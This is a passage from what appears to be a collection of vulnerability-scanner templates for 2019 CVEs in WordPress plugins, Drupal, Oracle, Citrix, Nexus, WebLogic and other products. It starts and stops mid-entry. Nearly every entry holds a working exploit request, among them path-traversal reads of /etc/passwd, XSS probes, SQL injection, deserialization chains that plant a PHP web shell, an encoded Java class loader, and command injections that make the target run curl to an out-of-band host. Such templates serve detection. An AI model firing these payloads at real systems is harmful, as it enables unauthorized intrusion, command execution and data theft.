application/x-www-form-urlencoded\n\n_wpnonce={{wpnonce3}}&action=editpost&post_ID={{post_id}}&post_title={{rand_text_alpha(10)}}&post_name={{rand_text_alpha(10)}}&meta_input%5b_wp_page_template%5d=cropped-{{randstr}}.jpg\n"],"matchers":[{"type":"status","status":[302],"internal":true}]},{"method":"GET","path":["{{BaseURL}}/?p={{post_id}}&0=echo+{{base64(string)}}|base64+-d","{{BaseURL}}/?p={{post_id}}&0=type+C:\\windows\\win.ini","{{BaseURL}}/?p={{post_id}}&0=type+..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["{{string}}","for 16-bit app support"],"condition":"or"}]}]},{"id":"CVE-2019-16469","info":{"name":"Adobe Experience Manager - Expression Language Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["data-formid=\"{{result}}\"","Embed Code"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10717","info":{"name":"BlogEngine.NET 3.3.7.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["~/App_Data/files/../../([a-zA-Z0-9\\.\\-]+)/([a-z0-9]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6340","info":{"name":"Drupal - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/node/1?_format=hal_json"],"body":"{ \"link\": [ { \"value\": \"link\", \"options\": \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:2:\\\"id\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\" } ], \"_links\": { \"type\": { \"href\": \"http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default\" } } }","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/api-bearer-auth/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/api-bearer-auth/swagger/swagger-config.yaml.php?&server=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18957","info":{"name":"MicroStrategy Library <11.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/MicroStrategyLibrary/auth/ui/loginPage?loginMode=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["previousLoginMode: alert(document.domain),"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9632","info":{"name":"ESAFENET CDG - Arbitrary File Download","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/CDGServer3/ClientAjax"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["<servlet-name>CDGPermissions</servlet-name>"]}]}]},{"id":"CVE-2019-7255","info":{"name":"Linear eMerge E3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/badging/badge_template_v0.php?layout=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Template : <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19411","info":{"name":"Huawei Firewall - Local File Inclusion","severity":"low"},"requests":[{"method":"GET","path":["{{BaseURL}}/umweb/../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-5434","info":{"name":"Revive Adserver 4.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /adxmlrpc.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip\n\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\"what\";O:11:\"Pdp\\Uri\\Url\":1:{S:17:\"\\00Pdp\\5CUri\\5CUrl\\00host\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:55:\"plugins/3rdPartyServers/ox3rdPartyServers/max.class.php\";S:13:\"\\00*\\00filesystem\";O:21:\"League\\Flysystem\\File\":2:{S:7:\"\\00*\\00path\";S:66:\"x://data:text/html;base64,PD9waHAgc3lzdGVtKCRfR0VUWyIwIl0pOyA/Pg==\";S:13:\"\\00*\\00filesystem\";O:29:\"League\\Flysystem\\MountManager\":2:{S:14:\"\\00*\\00filesystems\";a:1:{S:1:\"x\";O:27:\"League\\Flysystem\\Filesystem\":2:{S:10:\"\\00*\\00adapter\";O:30:\"League\\Flysystem\\Adapter\\Local\":1:{S:13:\"\\00*\\00pathPrefix\";S:0:\"\";}S:9:\"\\00*\\00config\";O:23:\"League\\Flysystem\\Config\":1:{S:11:\"\\00*\\00settings\";a:1:{S:15:\"disable_asserts\";b:1;}}}}S:10:\"\\00*\\00plugins\";a:1:{S:10:\"__toString\";O:34:\"League\\Flysystem\\Plugin\\ForcedCopy\":0:{}}}}}}}</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>\n","GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["text/html"]},{"type":"regex","part":"body_2","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-0230","info":{"name":"Apache Struts <=2.5.20 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id={{str}}%25{128*128}"],"matchers":[{"type":"word","part":"body","words":["{{str}}16384"]}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-14530","info":{"name":"OpenEMR <5.0.2 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1\n","GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["filename=passwd"]},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8937","info":{"name":"HotelDruid 2.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hoteldruid/visualizza_tabelle.php?anno=2019&id_sessione=&tipo_tabella=prenotazioni&subtotale_selezionate=1&num_cambia_pren=1&cerca_id_passati=1&cambia1=3134671%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"</script><script>alert(document.domain)</script>\"><input"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16057","info":{"name":"D-Link DNS-320 -  Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"uid=\", \"gid=\", \"pwd&id\")"],"condition":"and"}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-10098","info":{"name":"Apache HTTP server v2.4.0 to v2.4.39 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/http%3A%2F%2Fwww.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-9978","info":{"name":"WordPress Social Warfare <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Social Warfare"]}]},{"raw":["GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-19781","info":{"name":"Citrix ADC and Gateway - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/vpn/../vpns/cfg/smb.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["[global]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7481","info":{"name":"SonicWall SRA 4600 VPN - SQL Injection","severity":"high"},"requests":[{"raw":["POST /cgi-bin/supportInstaller HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nUser-Agent: MSIE\nContent-Type: application/x-www-form-urlencoded\n\nfromEmailInvite=1&customerTID=unpossible'+UNION+SELECT+0,0,0,11132*379123,0,0,0,0--\n"],"matchers":[{"type":"word","part":"body","words":["4220397236"]}]}]},{"id":"CVE-2019-15713","info":{"name":"WordPress My Calendar <= 3.1.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["My Calendar","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12962","info":{"name":"LiveZilla Server 8.0.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/index.php"],"headers":{"Accept-Language":";alert(document.domain)//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var detectedLanguage = ';alert(document.domain)//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15043","info":{"name":"Grafana - Improper Access Control","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/snapshots"],"body":"{\"dashboard\": {\"name\":\"{{payload}}\"}}","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"deleteUrl\":","\"deleteKey\":","\"key\":","\"url\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3929","info":{"name":"Barco/AWIND OEM Presentation Platform - Remote Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/cgi-bin/file_transfer.cgi"],"body":"file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-6793","info":{"name":"GitLab Enterprise Edition - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST /-/jira/login/oauth/access_token HTTP/1.1\nHost: {{interactsh-url}}\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]},{"type":"word","part":"body","words":["access_token="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7238","info":{"name":"Sonatype Nexus Repository Manager  <3.15.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /service/extdirect HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\n\n{\"action\": \"coreui_Component\", \"type\": \"rpc\", \"tid\": 8, \"data\": [{\"sort\": [{\"direction\": \"ASC\", \"property\": \"name\"}], \"start\": 0, \"filter\": [{\"property\": \"repositoryName\", \"value\": \"*\"}, {\"property\": \"expression\", \"value\": \"function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='cafebabe0000003100ae0a001f00560a005700580a005700590a005a005b0a005a005c0a005d005e0a005d005f0700600a000800610a006200630700640800650a001d00660800410a001d00670a006800690a0068006a08006b08004508006c08006d0a006e006f0a006e00700a001f00710a001d00720800730a000800740800750700760a001d00770700780a0079007a08007b08007c07007d0a0023007e0a0023007f0700800100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100114c4578706c6f69742f546573743233343b01000474657374010015284c6a6176612f6c616e672f537472696e673b29560100036f626a0100124c6a6176612f6c616e672f4f626a6563743b0100016901000149010003636d640100124c6a6176612f6c616e672f537472696e673b01000770726f636573730100134c6a6176612f6c616e672f50726f636573733b01000269730100154c6a6176612f696f2f496e70757453747265616d3b010006726573756c740100025b42010009726573756c745374720100067468726561640100124c6a6176612f6c616e672f5468726561643b0100056669656c640100194c6a6176612f6c616e672f7265666c6563742f4669656c643b01000c7468726561644c6f63616c7301000e7468726561644c6f63616c4d61700100114c6a6176612f6c616e672f436c6173733b01000a7461626c654669656c640100057461626c65010005656e74727901000a76616c75654669656c6401000e68747470436f6e6e656374696f6e01000e48747470436f6e6e656374696f6e0100076368616e6e656c01000b487474704368616e6e656c010008726573706f6e7365010008526573706f6e73650100067772697465720100154c6a6176612f696f2f5072696e745772697465723b0100164c6f63616c5661726961626c65547970655461626c650100144c6a6176612f6c616e672f436c6173733c2a3e3b01000a457863657074696f6e7307008101000a536f7572636546696c6501000c546573743233342e6a6176610c002700280700820c008300840c008500860700870c008800890c008a008b07008c0c008d00890c008e008f0100106a6176612f6c616e672f537472696e670c002700900700910c009200930100116a6176612f6c616e672f496e74656765720100106a6176612e6c616e672e5468726561640c009400950c009600970700980c0099009a0c009b009c0100246a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617001002a6a6176612e6c616e672e5468726561644c6f63616c245468726561644c6f63616c4d617024456e74727901000576616c756507009d0c009e009f0c009b00a00c00a100a20c00a300a40100276f72672e65636c697073652e6a657474792e7365727665722e48747470436f6e6e656374696f6e0c00a500a601000e676574487474704368616e6e656c01000f6a6176612f6c616e672f436c6173730c00a700a80100106a6176612f6c616e672f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-9955","info":{"name":"Zyxel - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?mp_idx=%22;alert(%271%27);//"],"matchers":[{"type":"word","part":"body","words":["\";alert('1');//","<title>Welcome</title>"],"condition":"and"}]}]},{"id":"CVE-2019-12593","info":{"name":"IceWarp Mail Server <=10.4.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini","{{BaseURL}}/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd"],"matchers-condition":"and","matchers":[{"type":"word","words":["[intl]","root:x:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18393","info":{"name":"Ignite Realtime Openfire <4.42 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/search/..\\..\\..\\conf\\openfire.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["org.jivesoftware.database.EmbeddedConnectionProvider","Most properties are stored in the Openfire database"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14470","info":{"name":"WordPress UserPro 4.9.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/userpro/"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2725","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\nContent-Type: text/xml\ncmd: id\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" 